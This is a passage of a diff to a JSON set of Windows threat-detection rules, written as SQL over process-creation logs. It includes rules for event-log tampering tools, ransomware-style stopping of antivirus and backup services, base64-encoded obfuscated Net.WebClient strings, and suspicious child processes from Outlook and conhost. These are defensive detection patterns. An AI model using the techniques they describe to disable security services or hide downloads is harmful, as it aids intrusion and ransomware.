"filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", 